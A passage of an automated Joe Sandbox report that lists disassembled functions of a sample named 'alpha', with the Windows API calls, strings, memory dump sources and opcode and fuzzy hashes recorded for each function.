                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmp$wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 3270668897-0
                                                                                      • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                      • Instruction ID: c41432ba874116d377e0a3b97e43b0d41e68b6863f403c353a7ccdbd77da7d63
                                                                                      • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                      • Instruction Fuzzy Hash: DE516D51E0C64281FBB9BF3194911B9A3A9EF4DB80FD89132CA4E276D5DF2CE9419370
                                                                                      Function 00007FF793758470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcstol$lstrcmp
                                                                                      • String ID:
                                                                                      • API String ID: 3515581199-0
                                                                                      • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                      • Instruction ID: 094dfc4e2f6acbda080e3114fc3b65725f70cf3eea344ca7487d6b2536472d66
                                                                                      • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                      • Instruction Fuzzy Hash: A321BF32B0864293F7B86F79A0D413AEAA8FB8D741F855135DB8F52794CE6DE8418620
                                                                                      Function 00007FF793771914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$DriveNamePathTypeVolume
                                                                                      • String ID:
                                                                                      • API String ID: 1029679093-0
                                                                                      • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                                      • Instruction ID: d2748621c102169287fe49a915f293aa06a48a4148cb503ec85151dcf19c3a90
                                                                                      • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                                      • Instruction Fuzzy Hash: C6313A32705AC18AEBB09F21D8943E8A7A8FB8DB89F844135CA4E5B744DF3CD649C750
                                                                                      Function 00007FF793757CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1617791916-0
                                                                                      • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                      • Instruction ID: 87d80e238fb7f5240acecd80a99318c3259e1028ee334585bc7f87be8c119fe0
                                                                                      • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                      • Instruction Fuzzy Hash: 8F21B861608B4196EA64AB71A590079F7A5FF8DBD1B849234CE1F23755DF3CE4018760
                                                                                      Function 00007FF79376CFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D01C
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D033
                                                                                      • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D06D
                                                                                      • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D07F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                      • String ID:
                                                                                      • API String ID: 1033415088-0
                                                                                      • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                      • Instruction ID: 55458762fe394f7b4b5b63179219d260baa1e86831a1c97bf7380498bc13a5f6
                                                                                      • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                      • Instruction Fuzzy Hash: 6411B231618A4287EB949B30F09417AF7A4FB8EB95F805135EA8F57B94DF3CD0458B60
                                                                                      Function 00007FF7937710D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF79376827A), ref: 00007FF7937711DC
                                                                                      • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF79376827A), ref: 00007FF793771277
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcessmemmovewcschr
                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                      • API String ID: 1135967885-381716982
                                                                                      • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                      • Instruction ID: cdb83d35fa5b77e32f8fe7f98466407e4391bb31a7b78aa3011ea5c0f2e2e3bb
                                                                                      • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                      • Instruction Fuzzy Hash: A0718B71A0824285E7B0EF35A4C06B9FAE8FB5C795F904235DA5EA7B94DF3CA4418B10
                                                                                      Function 00007FF79374E420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506D6
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506F0
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF79375074D
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF793750762
                                                                                        • Part of subcall function 00007FF79374EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F000
                                                                                        • Part of subcall function 00007FF79374EF40: wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F031
                                                                                        • Part of subcall function 00007FF79374EF40: iswdigit.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F0D6
                                                                                      • longjmp.MSVCRT ref: 00007FF79375CCBC
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375CCE0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                      • String ID: GeToken: (%x) '%s'
                                                                                      • API String ID: 3282654869-1994581435
                                                                                      • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                      • Instruction ID: 99633e7b5e42baa270dfa065b0535cb58dc77fad7db15a9d08ef94ad39ac433f
                                                                                      • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                      • Instruction Fuzzy Hash: B261D661B0964282FAB5BB3594D8279E3A9AF4DBB4FD44535CA1D27BD1EE3CF4408320
                                                                                      Function 00007FF7937708EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memmovewcsncmp
                                                                                      • String ID: 0123456789
                                                                                      • API String ID: 3879766669-2793719750
                                                                                      • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                      • Instruction ID: af59d75762b152ca902993d159d517179d91700b54b454e3fa65e5b11c6e95f4
                                                                                      • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                      • Instruction Fuzzy Hash: F541F622F1878681EEB5AF3594802BAA398FB4CB81F855131CE0E63784EE3CD4458790
                                                                                      Function 00007FF79376A0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376A0FC
                                                                                        • Part of subcall function 00007FF79374D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D46E
                                                                                        • Part of subcall function 00007FF79374D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D485
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D4EE
                                                                                        • Part of subcall function 00007FF79374D3F0: iswspace.MSVCRT ref: 00007FF79374D54D
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D569
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D58C
                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376A1FB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                      • String ID: Software\Classes
                                                                                      • API String ID: 2714550308-1656466771
                                                                                      • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                      • Instruction ID: c9b7cb568daea7bb68fde1f28dc672474092396fb4d67924aa0124a7b5e25a10
                                                                                      • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                      • Instruction Fuzzy Hash: BB41D422B09B1281EAE4EB25D494439A3B9FB4C7D4F808131DE5E533E0EE39E841C352
                                                                                      Function 00007FF793743BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmp
                                                                                      • String ID: /-Y
                                                                                      • API String ID: 1886669725-4274875248
                                                                                      • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                      • Instruction ID: 933df7ec9d4531cf0f7f0a647e6882fe3861c6e257788bb51cad2ac6043d301b
                                                                                      • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                      • Instruction Fuzzy Hash: 93217165B0875681FAB0AB229488178F6E6BB5CFC0F849031DE4D277D4DE3CE4A2D720